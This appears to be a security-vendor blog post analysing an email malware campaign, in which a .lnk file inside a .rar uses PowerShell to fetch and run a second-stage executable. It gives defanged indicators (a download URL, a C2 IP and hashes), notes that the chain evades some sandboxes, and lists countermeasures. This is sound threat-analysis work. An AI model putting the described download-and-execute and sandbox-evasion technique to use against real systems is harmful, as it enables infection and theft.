Email is one of the favorite methods used by attackers to infect systems. The malware used in email campaigns is often ransomware or banking malware.
We have recently seen some interesting tactical changes, including:
- Attachments with the malicious executable inside.
- Microsoft Office documents that contain a malicious macro. The macro will download ransomware or banking malware after execution.
- JavaScript files, executed by Wscript in Windows, dropping, for example, Locky ransomware.
We analyzed one recent email campaign with an attached .rar file. Inside this file, we found a .lnk file, which after executing uses PowerShell to download a second stage of malware.
Let’s take a look at the .lnk file:
While investigating the file we saw this command:
This command executes if the file is run:
The .lnk file perform the following:
- Opens a hidden window.
- Downloads a file from the domain http://anonfile[.]xyz/f/7f58d7dddec4b72bab0fb27cd852593e[.]exe
- Saves the file in the %TEMP% as “windows.scr.”
- Executes the downloaded file.
It’s possible to retrieve the file directly:
Analyzing the dropped malware
Continuing with our analysis:
The downloaded file, %TEMP%Windows.src, is executed by cmd.exe.
During execution the malware makes some changes to the infected machine. These changes will survive after the system is rebooted. The mechanism to persist creates an automatic task in the system using schtasks.
If we take a look at the binary we can extract its properties:
The malware is protected by the .NET obfuscator Smart Assembly, making it difficult to reverse engineer the malware and easily extract more information.
We can load the malware to see more properties:
PowerShell plus .lnk offers stealth on many sandbox systems
Some companies and security researchers use crawlers and other steps for automatic malware analysis. We tried to run this sample in some popular sandboxes to see its behavior. The analysis failed for some of them due to a few reasons:
- The sandbox did not have PowerShell, so the .lnk could not download the malware.
- The .lnk failed when the sandbox tried to run it.
- The sandbox did not support .lnk files.
Thus in a real environment a sandbox might fail to determine whether this file is malicious.
One example of an error during execution:
The ideal scenario is to prepare the sandbox machine with PowerShell and ensure that it can execute .lnk files to see if they show malicious behavior.
Countermeasures
To protect an organization, several countermeasures are effective against this type of threat.
- Modify the policy for execution in PowerShell, using the administrative templates.
- Allow the execution only of signed PowerShell scripts.
- Do not allow the saving of unknown .exe files in the %TEMP% folder.
- Do not allow the execution on unknown .exe files.
- Apply Windows restrictions such as AppLocker.
The idea is to capture some indicators of malicious activity performed on the infected machine and network to block the malware in your organization, and to combat similar future threats.
We found the malware connecting to IP address 174[.]127[.]99[.]183. This IP is located in the United States and shows other malicious activity, as we saw with VirusTotal:
After your investigation, you can use the indicators of compromise you find and apply countermeasures.
Hashes used during this analysis:
- 846e9c0631139cfdcbf270f8bdc08cdd39e9a89d
- 6c41bf5ead73e98c56397c37114f2c5a46fd2640
The post Malware Employs PowerShell to Infect Systems appeared first on McAfee.